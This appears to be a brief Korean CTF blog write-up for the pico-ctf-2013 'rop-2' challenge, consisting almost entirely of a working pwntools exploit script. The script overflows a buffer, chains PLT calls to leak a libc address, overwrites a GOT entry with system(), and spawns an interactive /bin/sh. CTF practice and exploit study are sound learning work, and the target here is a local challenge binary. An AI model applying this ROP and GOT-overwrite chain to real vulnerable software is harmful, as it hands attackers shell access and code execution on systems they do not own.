rop-1과 동일하다.
exploit code
from pwn import *
p = process('./rop2-20f65dd0bcbe267d')
read_plt = 0x8048380
read_got = 0x804a000
write_plt = 0x80483d0
write_got = 0x804a014
bss = 0x804a028
system_offset = 0x9ad60
pppr = 0x804859d
pr = 0x8048364
binsh = "/bin/sh"
payload = "A"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
payload += p32(write_plt)
payload += p32(pr)
payload += p32(bss)
log.info("Exploit..")
p.sendline(payload)
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))
p.sendline(binsh)
p.sendline(p32(system_addr))
p.interactive()
'CTF' 카테고리의 다른 글
| pico-ctf-2013 rop-4 (0) | 2018.07.17 |
|---|---|
| pico-ctf-2013 rop-3 (0) | 2018.07.14 |
| pico-ctf-2013 rop-1 (0) | 2018.07.14 |
| PlaidCTF 2013 ropasaurusrex (0) | 2018.07.14 |
| Defcon 2015 r0pbaby (0) | 2018.07.13 |